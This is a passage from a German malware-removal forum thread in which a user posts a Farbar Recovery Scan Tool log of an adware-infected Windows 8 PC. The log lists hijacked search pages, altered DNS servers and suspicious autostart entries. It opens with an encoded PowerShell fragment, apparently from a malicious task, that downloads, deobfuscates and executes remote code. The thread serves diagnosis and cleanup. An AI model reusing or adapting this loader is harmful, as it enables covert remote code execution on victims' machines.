BfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBTAGUAcgB2AGkAYwBlAFAAYQBjAGsATQBhAGoAbwByAFYAZQByAHMAaQBvAG4AIAAtAGwAdAAgADIAKQApAHsAYgByAGUAYQBrADsAfQB9AAoAaQBmACgALQBOAE8AVAAgACgAWwBTAGUAYwB1AHIAaQB0AHkALgBQAHIAaQBuAGMAaQBwAGEAbAAuAFcAaQBuAGQAbwB3AHMAUAByAGkAbgBjAGkAcABhAGwAXQBbAFMAZQBjAHUAcgBpAHQAeQAuAFAAcgBpAG4AYwBpAHAAYQBsAC4AVwBpAG4AZABvAHcAcwBJAGQAZQBuAHQAaQB0AHkAXQA6ADoARwBlAHQAQwB1AHIAcgBlAG4AdAAoACkAKQAuAEkAcwBJAG4AUgBvAGwAZQAoAFsAUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAEIAdQBpAGwAdABJAG4AUgBvAGwAZQBdACAAIgBBAGQAbQBpAG4AaQBzAHQAcgBhAHQAbwByACIAKQApAHsAYgByAGUAYQBrADsAfQAKAGYAdQBuAGMAdABpAG8AbgAgAHcAYwAoACQAdQByAGwAKQB7ACQAcgBxAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAcgBxAC4AVQBzAGUARABlAGYAYQB1AGwAdABDAHIAZQBkAGUAbgB0AGkAYQBsAHMAPQAkAHQAcgB1AGUAOwAkAHIAcQAuAEgAZQBhAGQAZQByAHMALgBBAGQAZAAoACIAdQBzAGUAcgAtAGEAZwBlAG4AdAAiACwAIgBNAG8AegBpAGwAbABhAC8ANAAuADAAIAAoAGMAbwBtAHAAYQB0AGkAYgBsAGUAOwAgAE0AUwBJAEUAIAA3AC4AMAA7ACAAVwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxADsAKQAiACkAOwByAGUAdAB1AHIAbgAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJAByAHEALgBEAG8AdwBuAGwAbwBhAGQARABhAHQAYQAoACQAdQByAGwAKQApADsAfQAKAGYAdQBuAGMAdABpAG8AbgAgAGQAcwB0AHIAKAAkAHIAYQB3AGQAYQB0AGEAKQB7ACQAYgB0AD0AWwBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAHIAYQB3AGQAYQB0AGEAKQA7ACQAZQB4AHQAPQAkAGIAdABbADAAXQA7ACQAawBlAHkAPQAkAGIAdABbADEAXQAgAC0AYgB4AG8AcgAgADEANwAwADsAZgBvAHIAKAAkAGkAPQAyADsAJABpACAALQBsAHQAIAAkAGIAdAAuAEwAZQBuAGcAdABoADsAJABpACsAKwApAHsAJABiAHQAWwAkAGkAXQA9ACgAJABiAHQAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACgAKAAkAGsAZQB5ACAAKwAgACQAaQApACAALQBiAGEAbgBkACAAMgA1ADUAKQApADsAfQAKAHIAZQB0AHUAcgBuACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAFMAdAByAGUAYQBtAFIAZQBhAGQAZQByACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEQAZQBmAGwAYQB0AGUAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQAoACQAYgB0ACwAMgAsACgAJABiAHQALgBMAGUAbgBnAHQAaAAtACQAZQB4AHQAKQApACkALABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAOwB9AAoAJABzAGMAPQBkAHMAdAByACgAdwBjACgAJABzAHUAcgBsACkAKQA7AEkAbgB2AG8AawBlAC0ARQB4AHAAcgBlAHMAcwBpAG8AbgAgAC0AYwBvAG0AbQBhAG4AZAAgACIAJABzAGMAIgA7AH0AYwBhAHQAYwBoAHsAfQA7AGUAeABpAHQAIAAwADsA

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Aufgabe verschoben. Die Datei, die durch die Aufgabe gestartet wird, wird nicht verschoben.)

Task: C:\WINDOWS\Tasks\Go_Palikan.job => C:\Users\Manz\AppData\Local\{8396B~1\UNINST~1.EXE
Task: C:\WINDOWS\Tasks\Price Fountain.job => C:\Users\Manz\AppData\Roaming\PRICEF~1\UPDATE~1\UPDATE~1.EXE <==== ACHTUNG

==================== Verknüpfungen =============================

(Die Einträge können gelistet werden, um sie zurückzusetzen oder zu entfernen.)

crazyhorse57 · 06.02.2016, 20:42

FRST (Versuch 2):

Code:

ATTFilter

Untersuchungsergebnis von Farbar Recovery Scan Tool (FRST) (x64) Version:27-01-2016
durchgeführt von Manz (Administrator) auf HAUS (06-02-2016 19:37:08)
Gestartet von E:\
Geladene Profile: Manz (Verfügbare Profile: Manz & Administrator)
Platform: Windows 8 (X64) Sprache: Deutsch (Deutschland)
Internet Explorer Version 10 (Standard-Browser: "C:\Users\Manz\AppData\Local\BoBrowser\Application\bobrowser.exe" "%1")
Start-Modus: Normal
Anleitung für Farbar Recovery Scan Tool: hxxp://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Prozesse (Nicht auf der Ausnahmeliste) =================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Prozess geschlossen. Die Datei wird nicht verschoben.)

(Microsoft Corporation) C:\Windows\System32\wlanext.exe
(Qualcomm Atheros Commnucations) C:\Program Files (x86)\Bluetooth Suite\AdminService.exe
(Acer Incorporated) C:\Program Files (x86)\Acer\Acer Cloud\CCDMonitorService.exe
(ClaraLabs) C:\Program Files (x86)\Common Files\ClaraUpdater\ClaraUpdater.exe
() C:\Windows\System32\DnsBlockUpdateSvc.exe
(Intel(R) Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\Jhi_service.exe
(Lavasoft Limited) C:\Program Files (x86)\Lavasoft\Web Companion\TcpService\2.3.4.7\LavasoftTcpService.exe
(McAfee, Inc.) C:\Program Files (x86)\McAfee\SiteAdvisor\mcsacore.exe
(McAfee, Inc.) C:\Program Files\Common Files\mcafee\mcsvchost\McSvHost.exe
(McAfee, Inc.) C:\Windows\System32\mfevtps.exe
(DotC United Inc) C:\Program Files (x86)\MPC Cleaner\MPCProtectService.exe
() C:\Program Files (x86)\B5B53C54-1454245483-E111-8F5D-B888E3A0B275\knsbFC2B.tmpfs
(NTI Corporation) C:\Program Files (x86)\NTI\Acer Backup Manager\IScheduleSvc.exe
(Microsoft Corporation) C:\Windows\SysWOW64\svchost.exe
(Dritek System INC.) C:\Windows\RfBtnSvc64.exe
() C:\Users\Manz\AppData\Local\B5B53C54-1454249191-E111-8F5D-B888E3A0B275\snscEFCA.tmp
() C:\Program Files\shopperz010220161759\Lugke.exe
(TU-Funs LIMITED) C:\ProgramData\2WdM2\WdMan.exe
() C:\Program Files (x86)\B5B53C54-1454245483-E111-8F5D-B888E3A0B275\hnsv4533.tmp
(Atheros) C:\Program Files (x86)\Qualcomm Atheros\Ath_WlanAgent.exe
() C:\Program Files (x86)\B5B53C54-1454245483-E111-8F5D-B888E3A0B275\jnsl20B1.tmp
(Client Connect LTD) C:\Program Files (x86)\SearchProtect\Main\bin\CltMngSvc.exe
(McAfee, Inc.) C:\Program Files\Common Files\mcafee\systemcore\mfefire.exe
(Microsoft Corporation) C:\Windows\SysWOW64\rundll32.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
() C:\Program Files\shopperz010220161759\Irytutia.exe
() C:\Program Files\shopperz010220161759\csrcc.exe
(Microsoft Corporation) C:\Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_6.2.9200.16384_none_622908ad510eb05b\TiWorker.exe
(Microsoft Corporation) C:\Windows\System32\msiexec.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
(McAfee, Inc.) C:\Program Files\Common Files\mcafee\systemcore\mcshield.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
() C:\Users\Manz\AppData\Local\SearchModule\dblaunch.exe
(Microsoft Corporation) C:\Windows\SysWOW64\rundll32.exe
(Microsoft Corporation) C:\Windows\SysWOW64\rundll32.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Microsoft Corporation) C:\Windows\SysWOW64\rundll32.exe
() C:\Program Files (x86)\securityutility\securityutility\2.0.0.1\Security Utilityupdt.exe
(Client Connect LTD) C:\Program Files (x86)\SearchProtect\SearchProtect\bin\cltmng.exe
() C:\Program Files\shopperz010220161759\Ratafah.exe
() C:\Program Files\shopperz010220161759\Ratafah64.exe
(Client Connect LTD) C:\Program Files (x86)\SearchProtect\UI\bin\cltmngui.exe
(DotC United Inc) C:\Program Files (x86)\MPC Cleaner\MPCTray.exe
(ult updater) C:\Program Files (x86)\SpaceSondPro_v53.12776\SpaceSondPro_Service.exe
() C:\Users\Manz\AppData\Local\SearchModule\2.8.9.113\DeskBar.exe
(Acer Incorporated) C:\Program Files\Acer\Acer Power Management\ePowerTray.exe
(blaim  updater) C:\Program Files (x86)\SpaceSondPro_v53.12776\ioproduct.exe
(DotC United Inc) C:\Program Files (x86)\MPC Cleaner\MPCTray64.exe
() C:\Users\Manz\AppData\Local\gmsd_de_005010228\upgmsd_de_005010228.exe
(Microsoft Corporation) C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16.4.4206.722_x64__8wekyb3d8bbwe\LiveComm.exe
(McAfee, Inc.) C:\Program Files\mcafee.com\agent\mcagent.exe
() C:\Program Files\Acer\Acer Instant Service\InstantUpdate\iuBrowserIEAgent.exe
() C:\Program Files\Acer\Acer Instant Service\InstantUpdate\iuEmailOutlookAgent.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe
(Acer Incorporated) C:\Program Files\Acer\Acer Power Management\ePowerSvc.exe
(Intel Corporation) C:\Windows\System32\igfxext.exe
(Intel Corporation) C:\Windows\System32\igfxsrvc.exe
(Acer Incorporated) C:\Program Files\Acer\Acer Power Management\ePowerEvent.exe
(Intel Corporation) C:\Windows\System32\igfxtray.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(Qualcomm Atheros) C:\Program Files (x86)\Bluetooth Suite\BtTray.exe
(Atheros Communications) C:\Program Files (x86)\Bluetooth Suite\BtvStack.exe
(Space Sound Pro) C:\Program Files\SpaceSoundPro\SpaceSoundPro.exe
(csdi                                                        ) C:\Users\Manz\AppData\Local\Temp\XXXO1K5S0ZW1\newversion.exe
() C:\Users\Manz\AppData\Local\Temp\is-5J9KF.tmp\newversion.tmp
(zik.mu) C:\Program Files\BubbleSound\3D BubbleSound.exe
(Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe
(Microsoft Corporation) C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
() C:\Users\Manz\AppData\Local\SearchModule\dblaunch.exe
(The Chromium Authors) C:\Users\Manz\AppData\Local\Chromium\Application\chrome.exe
() C:\Users\Manz\AppData\Local\SearchModule\2.8.9.113\DeskBar.exe
() C:\Users\Manz\AppData\Local\BoBrowser\Application\crash_service.exe
(The BoBrowser Authors) C:\Users\Manz\AppData\Local\BoBrowser\Application\bobrowser.exe
(NTI Corporation) C:\Program Files (x86)\NTI\Acer Backup Manager\BackupManagerTray.exe
(Professional Cleaning Software) C:\Program Files (x86)\Professional Cleaning Software\ProfessionalCleaningSoftware.exe
() C:\Program Files (x86)\gmsd_de_005010223\gmsd_de_005010223.exe
() C:\Program Files (x86)\rec_en_77\rec_en_77.exe
(The BoBrowser Authors) C:\Users\Manz\AppData\Local\BoBrowser\Application\bobrowser.exe
(1und1 Mail und Media GmbH) C:\Program Files (x86)\GMX MailCheck\IE\GMX_MailCheck_Broker.exe
() C:\Program Files (x86)\rec_de_184\rec_de_184.exe
(The BoBrowser Authors) C:\Users\Manz\AppData\Local\BoBrowser\Application\bobrowser.exe
(The BoBrowser Authors) C:\Users\Manz\AppData\Local\BoBrowser\Application\bobrowser.exe
(The BoBrowser Authors) C:\Users\Manz\AppData\Local\BoBrowser\Application\bobrowser.exe
(The BoBrowser Authors) C:\Users\Manz\AppData\Local\BoBrowser\Application\bobrowser.exe
(The BoBrowser Authors) C:\Users\Manz\AppData\Local\BoBrowser\Application\bobrowser.exe
(The BoBrowser Authors) C:\Users\Manz\AppData\Local\BoBrowser\Application\bobrowser.exe
(The BoBrowser Authors) C:\Users\Manz\AppData\Local\BoBrowser\Application\bobrowser.exe
(The BoBrowser Authors) C:\Users\Manz\AppData\Local\BoBrowser\Application\bobrowser.exe
() C:\Program Files (x86)\gmsd_de_005010228\gmsd_de_005010228.exe
(The Chromium Authors) C:\Users\Manz\AppData\Local\Chromium\Application\chrome.exe
(Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe
(Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe
(McAfee, Inc.) C:\Program Files\mcafee\virusscan\McVsShld.exe
(McAfee, Inc.) C:\Program Files\Common Files\mcafee\core\mchost.exe


==================== Registry (Nicht auf der Ausnahmeliste) ===========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt. Die Datei wird nicht verschoben.)

HKLM\...\Run: [BtPreLoad] => C:\Program Files (x86)\Bluetooth Suite\BtPreLoad.exe [64640 2012-07-31] ()
HKLM\...\Run: [SpaceSoundPro] => C:\Program Files\SpaceSoundPro\SpaceSoundPro.exe [4203520 2015-08-03] (Space Sound Pro)
HKLM\...\Run: [3D BubbleSound] => C:\Program Files\BubbleSound\3D BubbleSound.exe [14115328 2015-01-09] (zik.mu)
HKLM\...\Run: [Sound+] => C:\Program Files\Sound+\Sound+.exe [3836416 2016-02-03] (Sound+)
HKLM\...\Run: [IDSCPRODUCT] => C:\Program Files (x86)\Max Driver Updater\\idscservice.exe [262656 2016-02-06] (Recommandations)
HKLM-x32\...\Run: [BakupManagerTray] => C:\Program Files (x86)\NTI\Acer Backup Manager\BackupManagerTray.exe [533568 2012-08-22] (NTI Corporation)
HKLM-x32\...\Run: [mcui_exe] => C:\Program Files\McAfee.com\Agent\mcagent.exe [1527896 2012-06-22] (McAfee, Inc.)
HKLM-x32\...\Run: [gmsd_de_005010223] => C:\Program Files (x86)\gmsd_de_005010223\gmsd_de_005010223.exe [3971760 2016-01-30] ()
HKLM-x32\...\Run: [rec_en_77] => C:\Program Files (x86)\rec_en_77\rec_en_77.exe [3971288 2016-01-30] ()
HKLM-x32\...\Run: [MailCheck IE Broker] => C:\Program Files (x86)\GMX MailCheck\IE\GMX_MailCheck_Broker.exe [2171456 2015-12-17] (1und1 Mail und Media GmbH)
HKLM-x32\...\Run: [rec_de_184] => C:\Program Files (x86)\rec_de_184\rec_de_184.exe [3972784 2016-01-31] ()
HKLM-x32\...\Run: [gmsd_de_005010228] => C:\Program Files (x86)\gmsd_de_005010228\gmsd_de_005010228.exe [3955888 2016-02-04] ()
HKLM-x32\...\RunOnce: [IOPROTECT] => C:\Program Files (x86)\SpaceSondPro_v53.12776\ioproduct_service.bat [164 2016-02-06] ()
HKLM-x32\...\RunOnce: [upgmsd_de_005010223.exe] => C:\Users\Manz\AppData\Local\gmsd_de_005010223\upgmsd_de_005010223.exe [3276976 2016-01-30] ()
HKLM-x32\...\RunOnce: [upgmsd_de_005010228.exe] => C:\Users\Manz\AppData\Local\gmsd_de_005010228\upgmsd_de_005010228.exe [3271856 2016-02-04] ()
Winlogon\Notify\igfxcui: C:\WINDOWS\system32\igfxdev.dll (Intel Corporation)
HKU\S-1-5-19\...\RunOnce: [IsMyWinLockerReboot] => msiexec.exe /qn /x{voidguid}
HKU\S-1-5-20\...\RunOnce: [IsMyWinLockerReboot] => msiexec.exe /qn /x{voidguid}
HKU\S-1-5-21-2229505580-413648313-3343944023-1002\...\Run: [SearchModule] => C:\Users\Manz\AppData\Local\SearchModule\dblaunch.exe [391168 2015-12-01] ()
HKU\S-1-5-21-2229505580-413648313-3343944023-1002\...\Run: [Security Utility] => C:\Program Files (x86)\\securityutility\\securityutility\\2.0.0.1\securityutility.exe [290928 2016-01-31] (TODO: <Company name>)
HKU\S-1-5-21-2229505580-413648313-3343944023-1002\...\Run: [GoogleChromeAutoLaunch_E043F8592C2AE5BE99DCEC1B75F7941B] => C:\Users\Manz\AppData\Local\Chromium\Application\chrome.exe [667136 2015-08-04] (The Chromium Authors)
HKU\S-1-5-21-2229505580-413648313-3343944023-1002\...\Run: [CrashService] => C:\Users\Manz\AppData\Local\BoBrowser\Application\crash_service.exe [328824 2016-01-12] ()
HKU\S-1-5-21-2229505580-413648313-3343944023-1002\...\Run: [BoBrowser] => C:\Users\Manz\AppData\Local\BoBrowser\Application\bobrowser.exe [604784 2016-01-12] (The BoBrowser Authors)
HKU\S-1-5-18\...\RunOnce: [IsMyWinLockerReboot] => msiexec.exe /qn /x{voidguid}
AppInit_DLLs: C:\PROGRA~2\SearchProtect\SearchProtect\bin\VC64Loader.dll => C:\Program Files (x86)\SearchProtect\SearchProtect\bin\VC64Loader.dll [249104 2016-01-14] (Client Connect LTD)
AppInit_DLLs:  C:\Windows\system32\nvinitx.dll => Keine Datei
AppInit_DLLs-x32: C:\PROGRA~2\SearchProtect\SearchProtect\bin\VC32Loader.dll => C:\Program Files (x86)\SearchProtect\SearchProtect\bin\VC32Loader.dll [221456 2016-01-14] (Client Connect LTD)
AppInit_DLLs-x32:  C:\Windows\SysWOW64\nvinit.dll => Keine Datei
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Acer Backup Manager Tray.lnk [2012-09-11]
ShortcutTarget: Acer Backup Manager Tray.lnk -> C:\Program Files (x86)\NTI\Acer Backup Manager\BackupManagerTray.exe (NTI Corporation)
GroupPolicy: Beschränkung - Chrome <======= ACHTUNG
CHR HKLM\SOFTWARE\Policies\Google: Beschränkung <======= ACHTUNG

==================== Internet (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Eintrag entfernt oder auf den Standardwert zurückgesetzt, wenn es sich um einen Registryeintrag handelt.)

Winsock: Catalog9 01 C:\WINDOWS\SysWOW64\LavasoftTcpService.dll [345360 2016-01-31] (Lavasoft Limited)
Winsock: Catalog9 02 C:\WINDOWS\SysWOW64\LavasoftTcpService.dll [345360 2016-01-31] (Lavasoft Limited)
Winsock: Catalog9 03 C:\WINDOWS\SysWOW64\LavasoftTcpService.dll [345360 2016-01-31] (Lavasoft Limited)
Winsock: Catalog9 04 C:\WINDOWS\SysWOW64\LavasoftTcpService.dll [345360 2016-01-31] (Lavasoft Limited)
Winsock: Catalog9 16 C:\WINDOWS\SysWOW64\LavasoftTcpService.dll [345360 2016-01-31] (Lavasoft Limited)
Winsock: Catalog9-x64 01 C:\WINDOWS\system32\LavasoftTcpService64.dll [425744 2016-01-31] (Lavasoft Limited)
Winsock: Catalog9-x64 02 C:\WINDOWS\system32\LavasoftTcpService64.dll [425744 2016-01-31] (Lavasoft Limited)
Winsock: Catalog9-x64 03 C:\WINDOWS\system32\LavasoftTcpService64.dll [425744 2016-01-31] (Lavasoft Limited)
Winsock: Catalog9-x64 04 C:\WINDOWS\system32\LavasoftTcpService64.dll [425744 2016-01-31] (Lavasoft Limited)
Winsock: Catalog9-x64 16 C:\WINDOWS\system32\LavasoftTcpService64.dll [425744 2016-01-31] (Lavasoft Limited)
Hosts: Es ist mehr als ein Eintrag in der Hosts Datei zu finden. Siehe Hosts-Bereich in Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.178.1
Tcpip\..\Interfaces\{0384D9E4-6354-47BD-B63F-154E6D937972}: [NameServer] 104.197.191.4
Tcpip\..\Interfaces\{32DA37AE-A04D-4044-B015-2EB1CB8AE9E5}: [NameServer] 104.197.191.4
Tcpip\..\Interfaces\{32DA37AE-A04D-4044-B015-2EB1CB8AE9E5}: [DhcpNameServer] 192.168.178.1
Tcpip\..\Interfaces\{96CC4FD2-7AB2-4A4F-B6CB-52F22B8E3A50}: [NameServer] 104.197.191.4
Tcpip\..\Interfaces\{97e1de57-d6fa-11e1-be62-806e6f6e6963}: [NameServer] 104.197.191.4
Tcpip\..\Interfaces\{A10F49CF-5495-47E9-9E07-DCA82E339E8D}: [NameServer] 104.197.191.4
Tcpip\..\Interfaces\{A10F49CF-5495-47E9-9E07-DCA82E339E8D}: [DhcpNameServer] 150.200.3.1
Tcpip\..\Interfaces\{C02CAB3E-C922-4371-A1DD-E72CF76EF979}: [NameServer] 104.197.191.4
Tcpip\..\Interfaces\{FF696C85-800A-4636-AE7A-2631D28B75AD}: [NameServer] 104.197.191.4

Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.palikan.com/?f=1&a=bfp_cmi_16_04&cd=2XzuyEtN2Y1L1Qzu0Bzzzzzz0EtA0AtD0BtByByDyC0BtBzytN0D0Tzu0StCyEzytCtN1L2XzutAtFtCyBtFzytFtDtN1L1Czu1BtBtN1L1G1B1V1N2Y1L1Qzu2SyEzyzytC0BzzzzyEtGtC0Ezy0AtG0EyDyC0BtGyBtCyDtAtGyEzy0CyDtB0A0D0E0C0A0EtD2QtN1M1F1B2Z1V1N2Y1L1Qzu2SyB0FyE0A0ByEtCyBtGtDzy0A0AtGyE0ByBzytG0AtDtCyEtGyC0D0CtC0C0BtD0ByDyDzz0D2QtN0A0LzuyE&cr=512840388&ir=
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.palikan.com/?f=1&a=bfp_cmi_16_04&cd=2XzuyEtN2Y1L1Qzu0Bzzzzzz0EtA0AtD0BtByByDyC0BtBzytN0D0Tzu0StCyEzytCtN1L2XzutAtFtCyBtFzytFtDtN1L1Czu1BtBtN1L1G1B1V1N2Y1L1Qzu2SyEzyzytC0BzzzzyEtGtC0Ezy0AtG0EyDyC0BtGyBtCyDtAtGyEzy0CyDtB0A0D0E0C0A0EtD2QtN1M1F1B2Z1V1N2Y1L1Qzu2SyB0FyE0A0ByEtCyBtGtDzy0A0AtGyE0ByBzytG0AtDtCyEtGyC0D0CtC0C0BtD0ByDyDzz0D2QtN0A0LzuyE&cr=512840388&ir=
HKU\S-1-5-21-2229505580-413648313-3343944023-1002\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://acer13.msn.com
HKU\S-1-5-21-2229505580-413648313-3343944023-1002\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://acer13.msn.com
SearchScopes: HKLM -> {140E657E-89B5-411B-951A-24698B1E79EF} URL = hxxp://www.palikan.com/results.php?f=4&a=bfp_cmi_16_04&cd=2XzuyEtN2Y1L1Qzu0Bzzzzzz0EtA0AtD0BtByByDyC0BtBzytN0D0Tzu0StCyEzytCtN1L2XzutAtFtCyBtFzytFtDtN1L1Czu1BtBtN1L1G1B1V1N2Y1L1Qzu2SyEzyzytC0BzzzzyEtGtC0Ezy0AtG0EyDyC0BtGyBtCyDtAtGyEzy0CyDtB0A0D0E0C0A0EtD2QtN1M1F1B2Z1V1N2Y1L1Qzu2SyB0FyE0A0ByEtCyBtGtDzy0A0AtGyE0ByBzytG0AtDtCyEtGyC0D0CtC0C0BtD0ByDyDzz0D2QtN0A0LzuyE&cr=512840388&ir=&q={searchTerms}
SearchScopes: HKLM -> {6586d803-df30-46d3-a89a-4136c8571d45} URL = hxxp://www.palikan.com/results.php?f=4&a=bfp_cmi_16_04&cd=2XzuyEtN2Y1L1Qzu0Bzzzzzz0EtA0AtD0BtByByDyC0BtBzytN0D0Tzu0StCyEzytCtN1L2XzutAtFtCyBtFzytFtDtN1L1Czu1BtBtN1L1G1B1V1N2Y1L1Qzu2SyEzyzytC0BzzzzyEtGtC0Ezy0AtG0EyDyC0BtGyBtCyDtAtGyEzy0CyDtB0A0D0E0C0A0EtD2QtN1M1F1B2Z1V1N2Y1L1Qzu2SyB0FyE0A0ByEtCyBtGtDzy0A0AtGyE0ByBzytG0AtDtCyEtGyC0D0CtC0C0BtD0ByDyDzz0D2QtN0A0LzuyE&cr=512840388&ir=&q={searchTerms}
SearchScopes: HKU\S-1-5-21-2229505580-413648313-3343944023-1002 -> DefaultScope {140E657E-89B5-411B-951A-24698B1E79EF} URL = hxxp://www.palikan.com/results.php?f=4&a=bfp_cmi_16_04&cd=2XzuyEtN2Y1L1Qzu0Bzzzzzz0EtA0AtD0BtByByDyC0BtBzytN0D0Tzu0StCyEzytCtN1L2XzutAtFtCyBtFzytFtDtN1L1Czu1BtBtN1L1G1B1V1N2Y1L1Qzu2SyEzyzytC0BzzzzyEtGtC0Ezy0AtG0EyDyC0BtGyBtCyDtAtGyEzy0CyDtB0A0D0E0C0A0EtD2QtN1M1F1B2Z1V1N2Y1L1Qzu2SyB0FyE0A0ByEtCyBtGtDzy0A0AtGyE0ByBzytG0AtDtCyEtGyC0D0CtC0C0BtD0ByDyDzz0D2QtN0A0LzuyE&cr=512840388&ir=&q={searchTerms}
SearchScopes: HKU\S-1-5-21-2229505580-413648313-3343944023-1002 -> {015DB5FA-EAFB-4592-A95B-F44D3EE87FA9} URL = hxxp://www.trovi.com/Results.aspx?gd=&ctid=CT3321538&octid=EB_ORIGINAL_CTID&ISID=MDEC25DAF-A6CE-4B57-9019-93B3CF2948FC&SearchSource=58&CUI=&UM=8&UP=SPF3E97A65-0079-42ED-94F3-4AC0FA91C53A&D=020616&q={searchTerms}&SSPV=
SearchScopes: HKU\S-1-5-21-2229505580-413648313-3343944023-1002 -> {140E657E-89B5-411B-951A-24698B1E79EF} URL = hxxp://www.palikan.com/results.php?f=4&a=bfp_cmi_16_04&cd=2XzuyEtN2Y1L1Qzu0Bzzzzzz0EtA0AtD0BtByByDyC0BtBzytN0D0Tzu0StCyEzytCtN1L2XzutAtFtCyBtFzytFtDtN1L1Czu1BtBtN1L1G1B1V1N2Y1L1Qzu2SyEzyzytC0BzzzzyEtGtC0Ezy0AtG0EyDyC0BtGyBtCyDtAtGyEzy0CyDtB0A0D0E0C0A0EtD2QtN1M1F1B2Z1V1N2Y1L1Qzu2SyB0FyE0A0ByEtCyBtGtDzy0A0AtGyE0ByBzytG0AtDtCyEtGyC0D0CtC0C0BtD0ByDyDzz0D2QtN0A0LzuyE&cr=512840388&ir=&q={searchTerms}
SearchScopes: HKU\S-1-5-21-2229505580-413648313-3343944023-1002 -> {2DEFAF55-1981-4273-B141-DFD5ACCEBCB2} URL = hxxp://go.1und1.de/tb/ie_searchplugin/?q={searchTerms}&enc=UTF-8
SearchScopes: HKU\S-1-5-21-2229505580-413648313-3343944023-1002 -> {31E15B1A-A8DD-4EE8-B691-0B5EF63443F3} URL = hxxp://www-searching.com/s.ashx?prd=opensearch&q={searchTerms}&s=G26zftpbl2,d5d1e8af-1fcd-4d24-99e0-065c0a95ed60,
SearchScopes: HKU\S-1-5-21-2229505580-413648313-3343944023-1002 -> {41A2183B-D46F-4ACB-9F07-A0F2C3313AE2} URL = hxxp://go.mail.com/tb/en-us/ie_searchplugin/?q={searchTerms}&enc=UTF-8
SearchScopes: HKU\S-1-5-21-2229505580-413648313-3343944023-1002 -> {6586d803-df30-46d3-a89a-4136c8571d45} URL = hxxp://go.gmx.de/tb/ie_searchplugin/?q={searchTerms}&enc=UTF-8
SearchScopes: HKU\S-1-5-21-2229505580-413648313-3343944023-1002 -> {B0EC8E09-9A12-42A0-8972-CB73908A487E} URL = hxxp://go.web.de/tb/ie_searchplugin/?q={searchTerms}&enc=UTF-8
SearchScopes: HKU\S-1-5-21-2229505580-413648313-3343944023-1002 -> {B1AEE09D-45BC-480C-A2DF-7253EBC7E1F2} URL = 
BHO: CIESpeechBHO Class -> {8D10F6C4-0E01-4BD4-8601-11AC1FDF8126} -> C:\Program Files (x86)\Bluetooth Suite\IEPlugIn.dll [2012-07-31] (Qualcomm Atheros Commnucations)
BHO: GMX MailCheck BHO -> {BF42D4A8-016E-4fcd-B1EB-837659FD77C6} -> C:\Program Files\GMX MailCheck\IE\GMX_MailCheck.dll [2015-12-17] (1und1 Mail und Media GmbH)
BHO: DownloadProtect Extension -> {C654F3FE-8E84-4BB7-87CF-8D9171FC3C73} -> C:\Program Files\{4CC6E919-6ABD-43C0-AE89-BDF20C2F91FB}\{D5BAFF0D-E5C2-45E0-BD9E-8E46701FB258}.bin [2016-02-06] (Download Protect)
BHO: shopperz010220161759 -> {F64D5F15-81C2-4573-814A-31A0BF41A433} -> C:\Program Files\shopperz010220161759\Lonbee64.dll [2016-02-01] ()
BHO-x32: FunFeedr -> {11B16A3D-F03E-4565-A532-E66B219C9B03} -> C:\Users\Manz\AppData\Local\ext_funfeedr\ext_funfeedr.dll [2015-03-30] ()
